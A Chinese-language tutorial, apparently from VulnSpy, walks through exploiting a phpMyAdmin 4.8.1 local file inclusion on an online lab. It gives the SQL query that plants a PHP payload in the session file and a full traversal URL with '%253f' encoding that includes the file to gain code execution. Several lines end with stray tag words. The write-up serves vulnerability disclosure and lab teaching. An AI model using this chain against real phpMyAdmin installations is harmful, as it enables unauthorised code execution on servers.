今天ChaMd5安全團隊公開了一個phpMyAdmin最新版中的本地文件包含漏洞:phpmyadmin4.8.1後臺getshell。該漏洞利用不要求root賬號,只需可以登陸 phpMyAdmin 便可以利用。git
在這篇文章中咱們將使用VulnSpy的在線 phpMyAdmin 環境來演示該漏洞的利用。github
VulnSpy 在線 phpMyAdmin 環境地址:http://www.vulnspy.com/phpmyadmin-4.8.1/sql
漏洞細節
參照ChaMd5安全團隊發佈的文章:phpmyadmin4.8.1後臺getshellshell
漏洞利用
由於原文中包含數據庫文件可能因爲文件權限或者賬號權限不足而沒法利用,這裏咱們將使用另一種方式來利用該文件包含漏洞,即包含session文件。數據庫
1. 進入VulnSpy 在線 phpMyAdmin 環境地址,點擊 Start to Hack ,跳轉到VSPlate安全
2. 等待載入設置後,點擊 GO 按鈕開啓實驗bash
3. 實驗建立完成後,點擊演示地址進入實驗session
4. 使用賬號 root ,密碼 toor 登陸 phpMyAdminui
5. 點擊頂部導航欄中的SQL按鈕,執行SQL查詢
select '<?php phpinfo();exit;?>'
6. 獲取本身的SESSION ID
你的 SESSION ID 爲 Cookie 中的 phpMyAdmin 項。
這樣對應的SESSION文件爲/var/lib/php/sessions/sess_你的SESSION ID。
7. 包含SESSION文件,成功利用該漏洞
http://1a23009a9c9e959d9c70932bb9f634eb.vsplate.me/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_11njnj4253qq93vjm9q93nvc7p2lq82k
GitHub 源碼
https://github.com/vulnspy/phpmyadmin-4.8.1
參考
【首發】phpmyadmin4.8.1後臺getshell
phpMyAdmin 4.8.x LFI to RCE (Authorization Required) - https://blog.vulnspy.com/2018/06/21/phpMyAdmin-4-8-x-Authorited-CLI-to-RCE/